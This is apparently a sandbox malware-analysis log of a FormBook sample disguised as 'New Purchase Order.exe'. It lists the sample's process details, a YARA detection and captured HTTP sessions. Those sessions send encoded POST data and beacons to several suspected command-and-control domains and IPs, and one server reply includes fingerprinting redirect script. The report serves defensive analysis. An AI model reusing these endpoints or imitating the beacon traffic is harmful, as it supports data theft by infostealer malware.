Dec 3, 2024 14:42:55.629924059 CET | 1.1.1.1 | 192.168.2.7 | 0xc6e8 | No error (0) | www.bser101pp.buzz | - | 104.21.58.90 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:42:55.629924059 CET | 1.1.1.1 | 192.168.2.7 | 0xc6e8 | No error (0) | www.bser101pp.buzz | - | 172.67.158.106 | A (IP address) | IN (0x0001) | false
                                                        • www.cyperla.xyz
                                                        • www.cstrategy.online
                                                        • www.madhf.tech
                                                        • www.bser101pp.buzz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49830 | 31.186.11.114 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:42:07.730643988 CET | 368 | OUT | GET /qygv/?Z4=CrodyR&HZ=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WnueYbl0MlUQedog3ODQ7MufRvJpC6GuxIcFfxXtcYIG+pMPKAdgLM64C HTTP/1.1
                                                        Host: www.cyperla.xyz
                                                        Accept: */*
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Dec 3, 2024 14:42:09.146034956 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 1251
                                                        date: Tue, 03 Dec 2024 13:42:08 GMT
                                                        server: LiteSpeed
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                        Dec 3, 2024 14:42:09.146066904 CET | 253 | IN |
                                                        Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        1 | 192.168.2.7 | 49866 | 194.76.119.60 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:42:25.793107033 CET | 647 | OUT | POST /qx5d/ HTTP/1.1
                                                        Host: www.cstrategy.online
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.cstrategy.online
                                                        Content-Length: 215
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.cstrategy.online/qx5d/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Ascii: HZ=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYj0pTCoB0VGXORHeyebOGyuwcwsuxJ5FBs1NuJqM+keDImx+rg==
                                                        Dec 3, 2024 14:42:27.105839014 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Tue, 03 Dec 2024 13:42:26 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 178
                                                        Connection: close
                                                        Location: https://www.cstrategy.online/qx5d/
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.7 | 49873 | 194.76.119.60 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:42:28.466450930 CET | 667 | OUT | POST /qx5d/ HTTP/1.1
                                                        Host: www.cstrategy.online
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.cstrategy.online
                                                        Content-Length: 235
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.cstrategy.online/qx5d/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Ascii: HZ=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjWLYyIYmvkwDtxVjrethT7pF0Q69TnjctpyrUybgfbSDX3azEE=
                                                        Dec 3, 2024 14:42:29.842113018 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Tue, 03 Dec 2024 13:42:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 178
                                                        Connection: close
                                                        Location: https://www.cstrategy.online/qx5d/
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.2.7 | 49879 | 194.76.119.60 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:42:31.122350931 CET | 1680 | OUT | POST /qx5d/ HTTP/1.1
                                                        Host: www.cstrategy.online
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.cstrategy.online
                                                        Content-Length: 1247
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.cstrategy.online/qx5d/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Dec 3, 2024 14:42:32.545078993 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Tue, 03 Dec 2024 13:42:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 178
                                                        Connection: close
                                                        Location: https://www.cstrategy.online/qx5d/
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        4 | 192.168.2.7 | 49885 | 194.76.119.60 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:42:33.772001982 CET | 373 | OUT | GET /qx5d/?HZ=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPupPRQa5YnsqE2u4tLTeO6fSmNSULxsWJgPs8P1zGJQzra9DrAEYIvPdA&Z4=CrodyR HTTP/1.1
                                                        Host: www.cstrategy.online
                                                        Accept: */*
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Dec 3, 2024 14:42:35.135171890 CET | 545 | IN | HTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Tue, 03 Dec 2024 13:42:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 178
                                                        Connection: close
                                                        Location: https://www.cstrategy.online/qx5d/?HZ=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPupPRQa5YnsqE2u4tLTeO6fSmNSULxsWJgPs8P1zGJQzra9DrAEYIvPdA&Z4=CrodyR
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        5 | 192.168.2.7 | 49901 | 103.224.182.242 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:42:40.879669905 CET | 629 | OUT | POST /6ou6/ HTTP/1.1
                                                        Host: www.madhf.tech
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.madhf.tech
                                                        Content-Length: 215
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.madhf.tech/6ou6/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Ascii: HZ=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFSQsN7hGWb3JvtF9tEWrzIQBPO8MjorMam2TdWsqeOaB/O6ki6g==
                                                        Dec 3, 2024 14:42:42.138322115 CET | 871 | IN | HTTP/1.1 200 OK
                                                        date: Tue, 03 Dec 2024 13:42:41 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1733233361.3016953; expires=Fri, 01-Dec-2034 13:42:41 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 576
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        6 | 192.168.2.7 | 49907 | 103.224.182.242 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:42:43.545677900 CET | 649 | OUT | POST /6ou6/ HTTP/1.1
                                                        Host: www.madhf.tech
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.madhf.tech
                                                        Content-Length: 235
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.madhf.tech/6ou6/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Ascii: HZ=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWB50K+oV/NRvk3XFbOe/RtkVDoFmsTvvG0ymGWlW4cDzY9gLPz0=
                                                        Dec 3, 2024 14:42:44.890918970 CET | 871 | IN | HTTP/1.1 200 OK
                                                        date: Tue, 03 Dec 2024 13:42:44 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1733233364.5099805; expires=Fri, 01-Dec-2034 13:42:44 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 576
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        7 | 192.168.2.7 | 49915 | 103.224.182.242 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:42:46.216057062 CET | 1662 | OUT | POST /6ou6/ HTTP/1.1
                                                        Host: www.madhf.tech
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.madhf.tech
                                                        Content-Length: 1247
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.madhf.tech/6ou6/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Dec 3, 2024 14:42:47.573178053 CET | 871 | IN | HTTP/1.1 200 OK
                                                        date: Tue, 03 Dec 2024 13:42:47 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1733233367.6311852; expires=Fri, 01-Dec-2034 13:42:47 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 576
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        8 | 192.168.2.7 | 49922 | 103.224.182.242 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:42:48.869399071 CET | 367 | OUT | GET /6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t4Wjx9MdK2LZUtOM2FmXlL5GxHvEoA3gFavIudvI/vR7LkiZUXjXX7Xfe&Z4=CrodyR HTTP/1.1
                                                        Host: www.madhf.tech
                                                        Accept: */*
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Dec 3, 2024 14:42:50.187536001 CET | 1236 | IN | HTTP/1.1 200 OK
                                                        date: Tue, 03 Dec 2024 13:42:49 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1733233369.7680737; expires=Fri, 01-Dec-2034 13:42:49 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-length: 1514
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t4Wjx9MdK2LZUtOM2FmXlL5GxHvEoA3gFavIudvI/vR7LkiZUXjXX7Xfe&Z4=CrodyR&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="
                                                        Dec 3, 2024 14:42:50.187582016 CET | 550 | IN
                                                        Data Ascii: #ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t4Wjx9MdK2LZUtOM2FmXlL5GxHvEoA3gFavIudvI/vR7LkiZUXjXX7Xfe&Z4=CrodyR


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        9 | 192.168.2.7 | 49938 | 104.21.58.90 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:42:55.773456097 CET | 641 | OUT | POST /v89f/ HTTP/1.1
                                                        Host: www.bser101pp.buzz
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.bser101pp.buzz
                                                        Content-Length: 215
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.bser101pp.buzz/v89f/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Ascii: HZ=iTfEV/Gi0JnQQaER7Xj8i31gQDajEzkh8SHhYEYh/cfQ3Aw744xH6jezg7Ccuw02qR4gT3RNmWUsW7QUx1ZE2Yo5hh3GT3TuUX6gG5fE9qmYHztE4V+dH4ofZqiZg6nzoD/uCqzOP6Q7bBFdukhUK+dWLxV29XPp0nUuoP3GqwivZrexdCvvErkJMdrAYhJwh9PyuUWQau5Sxxv2YQ==
                                                        Dec 3, 2024 14:42:56.965662003 CET | 976 | IN | HTTP/1.1 404 Not Found
                                                        Date: Tue, 03 Dec 2024 13:42:56 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2F74XyXSEwvYmpRFhGdnd2ofG2kgmFNS8MJ5VhoVFeSxsJtVoy09Sv7Q%2FspUfjj%2B53wZGUYlJjYu3iVcal0vOVniH1OTX4Lp0qrtK7sr2g6VE6kvcnlRWrJi1h8vDLy4%2BXwXaIs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ec3fb9c5eb243be-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1721&rtt_var=860&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=641&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        10 | 192.168.2.7 | 49944 | 104.21.58.90 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:42:58.435972929 CET | 661 | OUT | POST /v89f/ HTTP/1.1
                                                        Host: www.bser101pp.buzz
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.bser101pp.buzz
                                                        Content-Length: 235
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.bser101pp.buzz/v89f/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Ascii: HZ=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uLQ0hA7i5xH2Dez4LDWwA09qR0STzRNmWAsW5YUwCNH2Io7tB3AOnTuUX6gG5Lu9uKYHDdEqgCccYoceqiZ3qn3oD/ICrvgP5o7bA1duQVLfOdcPxUl+lGS2FMAhODwg3mOcdfTHgjDa6cyIfP2PHUFj8Lqj2ixFZc48jOyOlX7M3OgK88vWUnA4BfwWOg=
                                                        Dec 3, 2024 14:42:59.650861025 CET | 975 | IN | HTTP/1.1 404 Not Found
                                                        Date: Tue, 03 Dec 2024 13:42:59 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwG9GsyzKh8Tcmmhkawf%2FtFCrgXxKWUWRzTYPPIm3wxLM%2Bc8jMYAhgR9b6vtVcqOVkG1D70Y2GcTRKUpYg8gFw9WPNKLbiVNTH4MyllY8gAL2EF9%2F4%2BPEU4VoDq1zBYYCrOnLUo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ec3fbad298d5e74-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=661&delivery_rate=0&cwnd=95&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        11 | 192.168.2.7 | 49950 | 104.21.58.90 | 80 | 3644 | C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:43:01.111830950 CET | 1674 | OUT | POST /v89f/ HTTP/1.1
                                                        Host: www.bser101pp.buzz
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.bser101pp.buzz
                                                        Content-Length: 1247
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.bser101pp.buzz/v89f/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Dec 3, 2024 14:43:02.373033047 CET | 974 | IN | HTTP/1.1 404 Not Found
                                                        Date: Tue, 03 Dec 2024 13:43:02 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u7uIgTGJkdu0J5HgOFJqIUUOn7OrA3zNodPu%2FLBVXZCLb%2Fy7lOHYkgRmJQqc%2FyjJe04k6iezh0MYSjT2WTb0N7MW9Wr3Y%2BuHGqDolMxVxH0G774%2FeIzar7wjlHZWoauoNuz9ddo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ec3fbbe28fd0f3d-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1551&rtt_var=775&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1674&delivery_rate=0&cwnd=129&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Dec 3, 2024 14:43:02.374073982 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                        12 | 192.168.2.7 | 49960 | 104.21.58.90 | 80
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:43:04.540548086 CET | 371 | OUT | GET /v89f/?HZ=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k3LEpkgrWWSGAJgqoML7k7rmuMTR7pR2QKok4A/6U1dLUrAezCoD2ZYZu&Z4=CrodyR HTTP/1.1
                                                        Host: www.bser101pp.buzz
                                                        Accept: */*
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Dec 3, 2024 14:43:05.726226091 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Date: Tue, 03 Dec 2024 13:43:05 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ko0cyYGrQDO%2BfemQ5%2BhtwJ4ihE76aAWvG2w0uzpHm%2Fb%2FAkYNunuuwqPVN8gzK%2BHqvpliuptxquDeQfauJKdY8Zeb45GSa0VZSFNRvZYsVhLdme1TvheO691VrIyZrGsSnc9nCGQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ec3fbd31c69de92-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1495&rtt_var=747&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=371&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome
                                                        Dec 3, 2024 14:43:05.726242065 CET | 100 | IN
                                                        Data Ascii: friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0



                                                        Target ID:0
                                                        Start time:08:40:56
                                                        Start date:03/12/2024
                                                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                                                        Imagebase:0xe50000
                                                        File size:814'080 bytes
                                                        MD5 hash:225B541DD84B7D8CBD7CB719A80E4DF9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:08:41:00
                                                        Start date:03/12/2024
                                                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                                                        Imagebase:0xeb0000
                                                        File size:814'080 bytes
                                                        MD5 hash:225B541DD84B7D8CBD7CB719A80E4DF9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
